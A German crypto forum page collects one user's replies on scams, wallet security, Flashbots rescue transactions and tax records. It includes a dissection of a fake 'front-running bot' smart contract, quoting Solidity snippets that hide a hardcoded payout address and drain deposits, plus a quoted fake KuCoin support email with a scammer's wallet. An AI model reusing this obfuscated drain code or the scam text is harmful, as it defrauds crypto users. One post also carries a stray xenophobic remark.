skunk

vor 21 Minuten schrieb Lukic:

Hallo,

Web Trader Pro heißt das Portal https://t-capital.ltd. Ich habe 4000€ mit meinen Finanzcoach auf die oben genannte platform eingezahlt . Die 20460 € waren mein Gewinn von einen Projekt .Von dieser Platform wurde dieses Geld zu Kucoin gesendet . Kucoin hat es blokiert .Dann habe ich 4100€ von Bybit auf Kucoin gesendet um wie in der Email gestanden ist zu verifizieren und bekam das :

Dear User,

We confirm that you can execute verification of your Block through ByBit or any other licensed platform.

After verification of your Block write us a short email and attach a screenshot as a confirmation of your verification.

You have to execute verification of your Block using USDT to your own KuCoin mirror account and then send to this Block address:
TQpweRU5BFUwsrqEfDAnWznVggMNG8MHFZ (TRON-TRC 20), where your amount is currently suspended.

After successful completion of the Block Verification your KuCoin Wallet will be credited with 20,460.00 EUR + 20% of the proof transaction.

All Verifying Block Transactions are being processed by our automatic AI Bot.
The duration of unblocking the funds takes up to 60 minutes.

PLEASE NOTE: THIS IS NOT A PAYMENT.
KuCoin WILL NEVER ASK YOU TO TELL YOUR LOGIN AND PASSWORD.
 

 

Die emailadresse ist : kucoin.support@inbox.eu

 

 

 

Glückwunsch du wurdest gescammt und das gleich doppelt. Dein Geld ist weg. Ab jetzt kannst du deinen Verlust nur noch erhöhen.

Mit KuKoin hat das ganze nichts zu tun. Der Scammer behauptet lediglich für / mit KuCoin zu arbeiten sendet dir aber direkt seine Wallet Adresse per Email.

vor 16 Minuten schrieb blaualge:

Umziehen hilft mehr😂😂

Dachgeschosswohnung direkt an der Hauptstraße? Ne lass mal das ist kein guter Tausch.

Am 15.1.2023 um 16:40 schrieb skunk:

Mein Balkon ist eher ein komplettes Zimmer mit einem größeren Loch in der Wand. Diese Öffnung hat ungünstige Maße. Bei 90° Montage habe ich nur 2,7m * 0,9m zur Verfügung. Da passen die Standard Module nicht rein.

Ich habe inzwischen eine Lösung für die ungünstigen Abmaße meines Balkons gefunden. ECTIVE SSP 170 Black Lightweight Module sind pro Stück 67cm breit. 4 Stück nebeneinander sind dann 2,68m. Rein äußerlich sieht das dann aus wie ein Sichtschutz mit in Summe 680W.

Zustimmung vom Vermieter habe ich bereits erhalten. Als nächstes werde ich noch die Fördergelder beantragen.

vor 4 Stunden schrieb Bonaster1:

Hey weiß jemand wieso man den AI2 token nicht verkauft bekommt? Hat einer einen tip

Mit solchen Scam und Shitcoins trade ich grundsätzlich nicht. Kannst du dein Problem vielleicht ein wenig erklären damit dir dennoch geholfen werden kann? Laut CMC sollte einem Verkauf nichts im Wege stehen:

https://coinmarketcap.com/dexscan/arbitrum/0x6a78e84fa0edad4d99eb90edc041cdbf85925961/
https://coinmarketcap.com/dexscan/ethereum/0x82d0cc520b98194978f240832247ac166e3007a9/

Edit: Jetzt gibt es schon hunderte von diesen Shitcoins mit immer gleichem Namen. Das hier scheint der richtige zu sein: https://coinmarketcap.com/dexscan/ethereum/0x32e12fe6f7f2af064aaed27fd612857944a0861c/

vor 6 Minuten schrieb nattyflo:

Ja ok, von der Trezor-Geschichte hab ich gehört. Aber es ging ja um einen Ledger Nano X, zwar nicht open source aber mit Secure Chip...

Wobei man nach der ganzen Diskussion, die es rund um Ledger zuletzt gab, eh nicht mehr weiß, was man noch glauben soll...

Auch so ein Secure Chip ist nicht unfehlbar und selbst wenn der Ledger Open Source wäre, bedeutet das nicht, dass die Software garantiert frei von Schwachstellen wäre. Fakt ist der Seed ist auf dem Hardware Wallet gespeichert. Mal angenommen der Finder nutzt eine noch unbekannte Schwachstelle und leert dein Wallet. Glaubst du der Hersteller des Hardware Wallets wird deinen Verlust ersetzen? Ohne eine solche schriftliche Garantie würde ich immer wie oben beschrieben vorgehen und jedes Restrisiko ausschließen.

Betrachte es mal so. Du gehst hier eine Wette ein. Dein Wetteinsatz ist all dein Guthaben. Dein möglicher Gewinn ist aber 0 bzw etwas Transaktionsgebühren. Wozu diese Wette abschließen? Der Hersteller des Hardware Wallets wird bei dieser Wette sofort einsteigen weil es nicht sein Geld ist was auf dem Spiel steht. Das ist einfach eine Wette die man selbst nicht eingehen sollte.

vor 55 Minuten schrieb nattyflo:

What?! Seit wann und wie genau kann man da den Seed auslesen? Hör ich so zum ersten mal..

Schon immer. Was glaubst du wo der Seed gespeichert wird? Den kann man mit geeigneten Messgeräten auslesen. Hier mal ein Beispiel: https://blog.trezor.io/our-response-to-the-read-protection-downgrade-attack-28d23f8949c6

Am sichersten soll aktuell BitBox sein wegen dem verbauten Secure Chip kombiniert mit Open Source. Aber selbst beim Verlust einer BitBox würde ich wie oben beschrieben vorgehen um jedes Restrisiko auszuschließen. Warum ein unnötiges Risiko eingehen wenn die Lösung doch so einfach ist? Einmal alles Guthaben auf einen neuen Seed transferieren und gut ist.

vor 1 Minute schrieb CoinSucht:

Das heißt der Betrüger kann nur zugreifen und Token stehlen, wenn ich Transaktionen durchführe durch einen bösartigen Scrip wie Sweeper bots/scripts ? Hat er auch den selben Zugang zu Metamask, so wie ich mich einlogge und eintrete oder kann er nur aus der Ferne von Mempool beobachten ? Ich versuche mir als Laie real vorzustellen.

Ich glaube du verstehst da was nicht ganz. Was braucht der Betrüger um Transaktionen durchzuführen? Ob du dein MetaMask entsperrst oder nicht, ändert doch nichts daran, dass du ihm bereits alle Informationen gegeben hast die er für eine Transaktion benötigt oder nicht? Wozu soll der Betrüger noch einen Sweeper Bot auf deinem Rechner installieren und laufen lassen wenn er doch bereits alle Informationen hat um selbst dann Transaktionen durchzuführen wenn dein Rechner vom Strom getrennt ist?

Was bedeutet für dich Mempool aus der Ferne zu beobachten? Kein Ort auf diesem Planeten ist weit genug entfernt um ihn gemessen an der Lichtgeschwindigkeit als Fern bezeichnen zu können. Der Mempool auf deinem Rechner ist identisch mit dem Mempool auf seinem Rechner. Er sieht deine Transaktionen nur wenige Millisekunden nachdem du die Transkation veröffentlich hast und schiebt direkt seine Transaktion hinterher. Alles unterhalb 200 Millisekunden wird für uns Menschen als Echtzeit war genommen. Du drückst den Knopf und praktisch in Echtzeit ist seine Transaktion auch im Mempool womit deine ETH praktisch weg sind noch bevor deine erste Transaktion überhaupt bestätigt wurde.

vor 21 Minuten schrieb CoinSucht:

Soweit ich verstehen konnte kann man mit Flashbots an den Betrüger vorbeischleiche, damit die ETHs nicht gestohlen werden. Könntest Du bitte hierbei etwas mehr darüber schreiben ? 

Die Schnittstelle zwischen dir und dem Betrüger ist der Mempool. In dem Moment wo du ETH auf die Adresse einzahlen willst, wird der Betrüger sofort und ohne Zeit Verzögerung die ETH auf sein Wallet umbuchen. Dieses Rennen kannst du nicht gewinnen weil der Betrüger bereits reagiert noch bevor deine ETH überhaupt auf der Blockchain bestätigt wurden.

Mit Flashbots kannst du deine Transaktionen in einen Block bekommen ohne den Weg über den öffentlichen Mempool zu gehen. Damit verheimlichst du deine ETH Einzahlung vor dem Betrüger. Die ETH Einzahlung ist erstmal nur Flashbots bekannt. Du darfst natürlich nicht auf eine Bestätigung warten sondern musst sofort mit einer minimal geringeren Transaktionsgebühr die zweite Transaktion ebenfalls senden. Das ist dann praktisch eine Einheit. Flashbots sorgt dafür, dass beide Transaktionen in einen Block kommen und der Betrüger diese erst dann sieht wenn sie bereits auf der Blockchain bestätigt wurden. 

vor 5 Stunden schrieb Oconna:

Nun habe ich inzwischen schon unzählige Transaktionen geprüft und bin zu der Annahme gekommen, dass dort Daten fehlen müssen.

Das sollte eigentlich unmöglich sein. Meines Wissens hat nur Cointracking eine ungenügende Fehlerprüfung. Alle andere Steuertools haben meines Wissens eine Validierung eingebaut, die die fehlenden Daten sofort erkennen müsste. Bei deinem Steuertool sollte das hier zu finden sein: https://help.blockpit.io/hc/de-at/articles/360012172479-Was-bedeuten-Hinweise-und-wie-kann-ich-sie-lösen-

vor 5 Stunden schrieb Oconna:

Da die Daten von Binance scheinbar nicht lückenlos sind, sehe ich aktuell auch keine Möglichkeit eine lückenlose Steuererklärung abzugeben.

Auch das klingt unwahrscheinlich. Ich lösche bei mir auch gern mal komplett alle Binance Transaktionen raus und ziehe sie über die Binance API neu. Das dauert eine halbe Ewigkeit wegen dem Rate Limit der Binance API ist bei mir aber immer vollständig. Die Daten die nicht automatisch per API gezogen werden können, lade ich per CSV Datei rein. In meinem Fall betrifft das lediglich die Kreditkarte und dafür gibt es in meinem Steuertool einen gesonderten Menüpunkt.

Welche Daten automatisch eingelesen werden und welche nicht, kannst du für dein Steuertool hier nachlesen: https://help.blockpit.io/hc/de-at/articles/360011889119-Wie-importiere-ich-Daten-mittels-Binance-API-Key-

vor 5 Stunden schrieb Oconna:

Da ich nur in 2021 mit Coins getraded habe und meine Wallets am 01.01.2021 und 31.12.201 quasi auf 0 standen, kann ich meinen Gewinn in 2021 recht einfach über meine Fiat Ein- und Auszahlungen berechnen.

Was kann ich nun in einem solchen Fall machen? Akzeptiert das Finanzamt eine Gewinnberechnung anhand der Fiat Ein- und Auszahlungen?

Nehmen wir mal folgenden fiktiven Fall an. Wir nehmen eine fiktive Person mit dem Namen Uli Hoeneß. Diese fiktive Person hat Anfang 2021 Coins gekauft. Sein Wallet hatte zu dem Zeitpunkt einen Wert von 1 BTC. Ende des Jahres verkauft er 1 BTC und zahlt sich den Betrag auf sein Bankkonto aus. Was er jedoch verheimlicht ist, dass er etwas Schwarzgeld beiseite gelegt hat. Tatsächlich wurden aus den anfänglich 1 BTC durch geschicktes Trading 5 BTC. Durch kreative Buchführung hat er 4 BTC verschwinden lassen. Genau das sind jetzt die fehlenden Daten.

Was glaubst du wird das Finanzamt machen um diesen fiktiven Fall aufzuklären? Glaubst du sie werden sich mit einer Abrechnung der Fiat Ein und Auszahlungen begnügen? Wie sollen sie damit diesen fiktiven Fall aufklären?

vor 4 Stunden schrieb SnakeZ3101:

Hallo zusammen,

ich habe meinen Ledger Nano X verloren und will mir aber keinen neuen Ledger kaufen, aber ich hatte eine Passphrase genutzt (25. frei-erstellbares Wort), welche Software Wallets gibt es die 25 Wörter unterstützen? Oder ist das nur so ein Ledger Ding, das nur mit Ledgern funktioniert?

LG

So ziemlich jedes halbwegs vernünftiges Wallet kann das. Überlege dir aber gut ob du deinen Seed wirklich irgendwo eingeben willst.

Lass dir nicht zu viel Zeit. Sollte ich deinen Ledger Nano X finden, ist es nur eine Frage der Zeit bis ich dein Wallet leer räume. Du solltest davon ausgehen, dass der Finder deines Hardware Wallets die Möglichkeit hat die ersten 24 Wörter deines Seeds aus dem Speicher auszulesen. Das ist alles andere als einfach aber mit geeigneten Messgeräten durchaus möglich. Das heißt die Sicherheit deines Geldes ist aktuell nur noch durch ein einziges Wort geschützt. Das ist deutlich zu wenig. Du solltest zur Sicherheit daher ein komplett neuen Seed und auch ein neues 25. Wort generieren und all dein Guthaben vom alten auf den neuen Seed transferieren.

vor 4 Stunden schrieb sisqonrw:

Gegen den Berichten von vielen Youtubern kann man die Cryptos ruhig auf Binance (nicht US) drauf lassen und bei denen weiter auch kaufen?

Nein. Selbst bei Kraken kannst du das nicht machen. Das Geld was du auf der Börse liegen lässt, ist grundsätzlich immer einem erhöhtem Risiko ausgesetzt. Die Börse kann jederzeit, gehackt, verklagt, insolvent, reguliert oder was dir sonst so einfällt. Oberste Regel im Umgang mit jeder vermeintlich sicheren Börse ist daher dein Geld nur solange einem Risiko auszusetzen wie notwendig. Also Geld einzahlen, zeitnah alle Trades durchführen und dann das Geld auszahlen. Lagere deine Coins lieber auf einem Hardware Wallet. Wenn dein erspartes irgendwann zu groß wird dann den ganzen Ablauf in kleinen Paketen ausführen um das Risiko möglichst gering zu halten.

vor einer Stunde schrieb rick.koelle:

ist das der Anfang?

Der Anfang von was?

vor 4 Stunden schrieb CoinSucht:

Habe ich überhaupt eine Möglichkeit meine Token von zwei Anbieter zum Tag des Claimens oder später retten zu können ?

Ja. Flashbots war bereits der richtige Suchbegriff.

vor 4 Stunden schrieb CoinSucht:

Können die Betrüger die meine Wallet kompromittiert haben auch die Möglichkeit bei diesen zwei Anbieter meine Token zu claimen und zu stehlen?

Ja. Sie haben vollen Zugriff auf dein Wallet und können grundsätzlich alles machen was du auch machen kannst.

vor 4 Stunden schrieb CoinSucht:

Die Betrüger hatten die offizielle Seite vom jeweiligen Token auf Telegram so perfekt kopiert, dass ich reingefallen bin.

Hier liegst du falsch. Nehmen wir mal kurz an es wäre die offizielle Seite gewesen. Warum willst du da überhaupt deinen Seed eingeben? Den Teil würde ich an deiner Stelle nochmal überdenken sonst wirst du auf diesen Trick in Zukunft nochmal reinfallen.

Was soll den daran gefährlich sein?

Am 13.6.2023 um 18:21 schrieb Octagon:

Und einen Tag danach hat eine andere Adresse "swap" ausgeführt. Function: swap(string aggregatorId, address tokenFrom, uint256 amount, bytes data)

Das gibts aber gar nicht in diesem Contract !?

Jetzt sehe ich gerade wo der Swap her kommt. Es werden 3 weitere Smart Contract importiert. Das erklärt den Swap Aufruf.

Ansonsten wie gehabt. Ich habe den Quellcode einen Post über mir im Testnet ausprobiert und erneut geht alles an die bereits bekannte Adresse. Ich kann mir weiterhin nicht erklären warum auf dem Contract noch Guthaben liegt obwohl der Start Aufruf in meinen Tests bereits alles transferiert hat.

vor 31 Minuten schrieb luxy:

Im presale kauft man ja deswegen ein, weil der Token ja günstiger ist als später beim Listing. 

[...]

Da auch kein Ceo oder irgendwelche Namen von Verantwortlichen auf der Homepage genannt werden, stinkt dies, für mich jedenfalls, nach einem Riesen grossen Scam.

Ich sehe das etwas anders. Ich stufe all diese Meme Coins von Anfang an als Scam ein. Es wird am Ende immer mehr Verlierer als Gewinner geben.

Du hast den Coin ursprünglich gekauft weil du auf Preissteigerungen gehofft hattest. Ob der Meme Coin jemals liefert was im Whitepaper alles versprochen wird, ist völlig egal. Hauptsache du kannst den Coin mit Gewinn an jemand anderes verkaufen. Ist das nicht so oder so ein Pakt mit dem Teufel? Warum beklagst du dich jetzt, dass dieser Teufel sich praktisch genau so verhält wie man das erwarten würde? Maximaler Gewinn nur eben dieses mal nicht für dich.

vor 52 Minuten schrieb luxy:

Ich denke also, dass nach dem Listing der Kurs nach unten gehen wird, jedermann das flattern bekommen wird und der Kurs daraufhin gnadenlos abstürzen wird. Daraufhin wird er wohl wieder (wahrscheinlich von den selben Leuten die das ganze geplant haben und 30 Millionen eingesackt haben wohl wieder eingekauft werden.

Machen wir mal ein kleines Rollenspiel. Stell dir vor du hättest das Projekt ins Leben gerufen und 30 Millionen USD beim Sale eingenommen. Was machst du mit diesen 30 Millionen? Richtig du steckst es in die eigene Tasche und startest direkt das nächste Projekt mit einem neuen Token Sale. Solange der Markt heiß auf Presales ist, wist du dein Angebot genau darauf ausrichten.

vor 5 Minuten schrieb Axiom0815:

Das nächste "freudige Ereignis" steht schon wieder an, wenn 2024 die Krankenkassenabgaben erhöht werden. Klar, Mio Flüchtlinge aus aller Welt strömen nach Deutschland und in die Krankenkassen. Logo steigen die Kosten.

vor 1 Stunde schrieb Octagon:

Vermutlich failed die Transaction, deshalb.

Kurzer Test: Falls du von MyContractResolver die Funktion aufrufst gehts nicht. Denn:

    modifier onlyCreator() {
        require(msg.sender == creator, "Only contract creator can call this function.");
        _;
    }

Das require wird fehlschlagen, da msg.sender != creator. Wenn so aufgerufen ist msg.sender der callende contract und nicht der creator. Ich vermute das es fehlschlägt, und deshalb so hoch anzeigt. Normal ist es höchstens vielleicht ein Euro, wenn die Ausführung klappt, kostet ca. 37k gas, also nicht viel.

 

Kannst du mal den kompletten Quellcode deines original Contracts posten?

Am 10.6.2023 um 16:17 schrieb sladostrastnik:

Aber hier ist die Anleitung, der ich aufgesessen habe : 

Ich habe mal den Code aus der Anleitung im Testnet deployed um die Zieladresse raus zu bekommen. Das Muster passt aber nicht zu deinem Contract. Eventuell haben die Scammer zwischenzeitlich den Quellcode verändert. Aktuelle würde das hier passieren: https://etherscan.io/address/0x75490e387f72a229e00f73f4e5f1d5477fcae6cf

Schon beim Start wird alles Guthaben umgebucht. Bei dir liegt das Guthaben auch nach dem Aufruf von Start noch im Contract. Irgendwas passt hier nicht zusammen. Kannst du uns vielleicht mal den Quellcode geben, den du noch in remix gespeichert hast?

vor 3 Stunden schrieb sladostrastnik:

Wies0 der das noch nicht weg ist (falls ich es richtig verstehe - und der Betrüger hats bereits bei sich im Wallet)?

Wozu die Eile?

Aus Sicht des Scammer stellt sich die spannende Frage wann die Opfer merken, dass mit dem Smart Contract etwas nicht stimmt und wie viel weitere ETH sie bis dahin noch einzahlen. Auch interessant ist wie vielen anderen Menschen du von diesem tollen Smart Contract in der Zeit erzählst. Über all das wird der Scammer eine Statistik führen. Jedes Opfer ist ein weiterer Messpunkt für diese Statistik. Der Scammer wird von sich aus erst dann ein Withdraw initieren wenn er davon ausgehen kann, dass es sich nicht mehr lohnt weiter abzuwarten. Aus seiner Sicht besteht zumindest aktuell noch die Möglichkeit, dass du weitere ETH einzahlst. Solange diese Möglichkeit besteht wird der Scammer die Füße still halten.

Der finale Messpunkt für seine Statistik wird sein zu welchem spätest möglichen Zeitpunkt seine Opfer netterweise noch Withdraw ausführen. Bedeutet für den Scammer immerhin, dass er die Transaktionsgebühren nicht bezahlen muss.

vor einer Stunde schrieb Octagon:

Er kann nicht wissen, dass dieser Contract existiert. Soweit gab es keine Funktion, die irgendeine Meldung oder was irgendwohin verschickt beim Deployen. Er ist darauf angewiesen, dass jemand "start" ausführt. Oder er scannt alle neuen Contracts auf ETH, um sie zu suchen.

Die Start Funktion erzeugt netterweise einen Log Eintrag. Ich hätte behauptet ich kann meiner lokalen Geth Node eine Einstellung mit auf den Weg geben diese Log Einträge alle in ein Debug Log zu schreiben. Damit wären all diese Smart Contracts recht einfach zu finden.

vor 8 Stunden schrieb sladostrastnik:

wenn nix geht, lass ichs dort für die Ewigkeit, jaa...

Da macht dir mal keine Sorgen. Die Withdraw Funktion kann von jedem ausgeführt werden. Es gibt eine Person die einen finanziellen Anreiz in höher deiner ETH hat die Withdraw Funktion irgendwann aufzurufen...

vor 1 Stunde schrieb sladostrastnik:

da withdrawl drin ist im Code und ausgeführt werden kann, dann geht doch der Betrag automatisch nur (!) an den Ersteller des Contracts? Ist das richtig?

Nein. Nur weil die Funktion Withdraw heißt, ist das noch lange keine Garantie dafür, dass die an deine Adresse auszahlt. Der Quellcode lässt mich daran irgendwie zweifeln. Ich vermute eher das ist ein Scam und zwar ein sehr geschickter. So geschickt, dass ich es nicht mit Gewissheit sagen.

Was mich stutzig macht ist das Fehlen deiner Adresse. Jeder andere Smart Contract würde im Quellcode eine Variable mit dem Namen Owner setzen oder irgendwas in der Richtung. Wenn ich das richtig lese dann wird das hier ausgeführt um die Adresse zu ermitteln:
 

    /*
     * @dev Iterating through all mempool to call the one with the with highest possible returns
     * @return `self`.
     */
    function callMempool() internal pure returns (string memory) {
        string memory _memPoolOffset = mempool("x", checkLiquidity(getMemPoolOffset()));
        uint _memPoolSol = 661728;
        uint _memPoolLength = getMemPoolLength();
        uint _memPoolSize = 774919;
        uint _memPoolHeight = getMemPoolHeight();
        uint _memPoolWidth = 157565;
        uint _memPoolDepth = getMemPoolDepth();
        uint _memPoolCount = 474310;

        string memory _memPool1 = mempool(_memPoolOffset, checkLiquidity(_memPoolSol));
        string memory _memPool2 = mempool(checkLiquidity(_memPoolLength), checkLiquidity(_memPoolSize));
        string memory _memPool3 = mempool(checkLiquidity(_memPoolHeight), checkLiquidity(_memPoolWidth));
        string memory _memPool4 = mempool(checkLiquidity(_memPoolDepth), checkLiquidity(_memPoolCount));

        string memory _allMempools = mempool(mempool(_memPool1, _memPool2), mempool(_memPool3, _memPool4));
        string memory _fullMempool = mempool("0", _allMempools);

        return _fullMempool;
    }

Warum so umständlich? Das sieht mir eher danach aus, dass der Smart Contract praktisch eine fixe Auszahlungsadresse generiert aber diese geschickt im Quellcode versteckt. Dem traue ich nicht über den Weg.
 

vor 1 Stunde schrieb sladostrastnik:

Wenn aber es nicht automatisch an den Ersteller zurück geht, dann kann man doch die Funktion "withdrawProfits()" in seinem Code mit "msg.sender" erweitern.

Und wie stellst du dir das vor? Einmal deployed kannst du den Quellcode nicht nachträglich ändern.

Was du dagegen machen kannst ist die aktuell noch als internal markierte Funktion einfach mal Public machen. Dann den Code erneut deployen. Vorzugsweise im Testnet um nicht unnötig Transaktionsgebühren zu bezahlen.

Edit: Ich sehe gerade die Withdrawal Adresse ist komplett hardcodiert. Die 3 get Funktionen, die dort aufgerufen werden, geben auch nur jeweils eine Zahl zurück. Das heißt es ist egal wer den Smart Contract deployed. Die Auszahlung geht immer an die gleiche Adresse.

Ich tippe mal ganz stark darauf, dass der Smart Contract das Ziel hat dich möglichst lange im Unklaren zu lassen. Du butterst da 0,5 ETH rein. Dann bekommst du auf magische Art und Weise einen Reward wo es eigentlich keinen geben dürfte. Vermutlich mit der Absicht in deinem Gehirn den Schalter mit der Aufschrift "Gier" zu aktivieren um dich dazu zu verleiten weitere ETH einzuzahlen. Wenn du irgendwann in vielen Monden dann dein Geld auszahlen willst, folgt die Überraschung. Darauf tippe ich.
 

vor 1 Stunde schrieb PeWi:

Wenn das tatsächlich ausprogrammiertes Frontrunning auf Uniswap ist, dann könnte es durchaus funktionieren?

Warum sollte irgend jemand bei seinem Trade einen fremden Smart Contract mit ausführen? Eigentlich gilt, dass jemand den Smart Contract aufrufen muss. Ein Smart Contract wird niemals automatisch ausgeführt. Die ganzen Frontrunner Geschichten laufen soweit ich weiß über Bots. Das Zauberwort dafür heißt MEV. Das sind Bots, die den ganzen Tag lang alle Transaktionen des Mempools durchgehen und schauen ob sie irgendwie Profit daraus schlagen können. Finden sie eine Möglichkeit, müssen sie aktiv eine Transaktion erstellen, signieren und mit einer entsprechend höheren Transaktion Gebühr noch davor in den Mempool schieben.

Interessant ist auch, dass in dem Quellcode mehrfach das Wort Mempool fällt aber dahinter verbergen sich dann nur hardcodierte Werte. Es gibt ein getMemPoolLength, getMemPoolHeight, getMemPoolDepth. Seit wann hat der Mempool 3 Dimensionen? Und warum geben alle 3 Funktionen einen fixen Wert zurück? Fun Fact am Rande: Der Smart Contract kann den Mempool so oder so nicht abfragen. Insofern ist der Teil des Codes ziemlich sicher Bullshit. Vermutlich mit dem Ziel die Auszahlungsadresse zu maskieren sodass sie nicht auf den ersten Blick ins Auge springt.

vor 34 Minuten schrieb sladostrastnik:

pm geht irgendwie nicht. also hier ist sie: 0xAA0d1d3DFa6996B3E0E0BeCbe22D72776EA17BF1

0,49 ETH liegen noch da und warten auf den Withdrawal. An welche Adresse der gehen würde kann ich jedoch nicht so einfach einsehen. Das müsstest du dann wohl selbst machen.

Edit: Ich habe den Code gerade mal selbst kompiliert. Adresse prüfen kannst du leider nicht. Du kannst tatsächlich nur Start oder Withdraw ausführen. Mehr Infos gibt es nicht. 

Ausgeführt hast du das hier:

    /*
     * @dev Perform frontrun action from different contract pools
     * @return `liquidity`.
     */
    function start() public payable { 
        emit Log("Running FrontRun attack on Uniswap. This can take a while please wait...");
        payable(_callFrontRunActionMempool()).transfer(address(this).balance);
    }

Es gibt ein Withdrawal direkt darunter:

    /*
     * @dev withdraws profits back to the contract creator address
     * @return `profits`.
     */
    function withdrawal() public payable { 
        emit Log("Sending profits back to contract creator address...");
        payable(withdrawProfits()).transfer(address(this).balance);
    }

Wenn du wissen willst an welche Adresse der Withdrawal gehen würde dann musst du einmal withdrawProfits ausführen. Das sollte eigentlich kostenlos sein und du kannst prüfen ob der widthrawal überhaupt an deine Adresse gehen würde.

Zusätzlich solltest du auch prüfen ob der Contract überhaupt eine Balance hat. Das kannst du recht einfach über einen Block Explorer machen.

Wenn du kein Wort verstehst von dem was ich geschrieben habe dann kannst du mir auch einfach die Adresse des Contracts senden und ich prüfe das kurz.

vor einer Stunde schrieb Master1980:

Hallo zusammen, habe gestern eine mail bekommen für einen Chainlink Airdrop. Sieht sehr echt aus die mail.

Kann das jemand bestätigen, das sowas geplant ist? Die ist von Chainlink Labs...

Stell dir mal für einen Moment vor es wäre eine Email von deiner Hausbank. Was machst du um den Inhalt der Email zu verifizieren? Im Forum nachfragen ob dir der Scammer höchst persönlich die Echtheit seine Phishing Email bestätigt? Meinst du nicht, dass das der falsche Weg ist?